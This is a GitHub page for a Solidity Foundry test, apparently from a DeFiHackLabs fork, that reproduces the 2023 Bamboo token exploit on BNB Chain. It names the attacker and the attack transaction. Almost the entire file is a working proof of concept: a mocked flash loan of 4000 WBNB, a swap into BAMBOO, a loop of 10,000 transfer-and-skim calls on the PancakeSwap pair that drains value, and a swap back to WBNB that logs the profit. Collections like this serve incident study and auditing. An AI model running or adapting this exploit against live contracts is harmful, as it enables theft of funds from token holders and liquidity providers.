forked from SunWeb3Sec/DeFiHackLabs
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Bamboo_exp.sol
82 lines (60 loc) · 3.02 KB
/
Bamboo_exp.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./interface.sol";
// @KeyInfo - Total Lost : ~200BNB
// Attacker : 0x00703face6621bd207d3b4ac9867058190c0bb09
// Attack Contract : 0xcdf0eb202cfd1f502f3fdca9006a4b5729aadebc
// Vulnerable Contract : 0xed56784bc8f2c036f6b0d8e04cb83c253e4a6a94
// Attack Tx : https://explorer.phalcon.xyz/tx/bsc/0x88a6c2c3ce86d4e0b1356861b749175884293f4302dbfdbfb16a5e373ab58a10
// Block: 29668034
// @Info
// Vulnerable Contract Code : https://bscscan.com/address/0xed56784bc8f2c036f6b0d8e04cb83c253e4a6a94
// @Analysis
// Post-mortem : https://twitter.com/Phalcon_xyz/status/1676220090142916611
// @POC Author : https://twitter.com/eugenioclrc
contract BambooTest is Test {
IERC20 wbnb = IERC20(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c);
IERC20 bamboo = IERC20(0xED56784bC8F2C036f6b0D8E04Cb83C253e4a6A94);
IPancakePair wbnbBambooPair = IPancakePair(0x0557713d02A15a69Dea5DD4116047e50F521C1b1);
IPancakeRouter router = IPancakeRouter(payable(0x10ED43C718714eb63d5aA57B78B54704E256024E));
IUniswapV2Factory factory = IUniswapV2Factory(0xcA143Ce32Fe78f1f7019d7d551a6402fC5350c73);
CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
function setUp() public {
cheats.createSelectFork("bsc", 29_668_034);
vm.label(address(wbnb), "WBNB");
vm.label(address(bamboo), "BAMBOO");
vm.label(address(router), "PancakeRouter");
}
function toEth(uint256 _wei) internal returns (string memory) {
string memory eth = vm.toString(_wei / 1 ether);
string memory decs = vm.toString(_wei % 1 ether);
string memory result = string.concat(string.concat(eth, "."), decs);
return result;
}
function testExploit() public {
// get a flash loan (lets mock it out)
deal(address(wbnb), address(this), 4000 ether);
console.log("start balance after flashloan", toEth(wbnb.balanceOf(address(this))));
uint256 bambooBalance = bamboo.balanceOf(address(wbnbBambooPair));
address[] memory path;
path = new address[](2);
path[0] = address(wbnb);
path[1] = address(bamboo);
uint256[] memory amounts = router.getAmountsIn(bambooBalance * 9 / 10, path);
wbnb.approve(address(router), type(uint256).max);
router.swapExactTokensForTokens(amounts[1], 0, path, address(this), block.timestamp);
uint256 max = 10_000;
for (uint256 i; i < max; ++i) {
bamboo.transfer(address(wbnbBambooPair), 1_343_870_967_101_818_317);
wbnbBambooPair.skim(address(this));
}
path[0] = address(bamboo);
path[1] = address(wbnb);
bamboo.approve(address(router), type(uint256).max);
router.swapExactTokensForTokensSupportingFeeOnTransferTokens(
bamboo.balanceOf(address(this)), 0, path, address(this), block.timestamp
);
console.log("profit after return flashloan", toEth(wbnb.balanceOf(address(this)) - 4000 ether));
}
}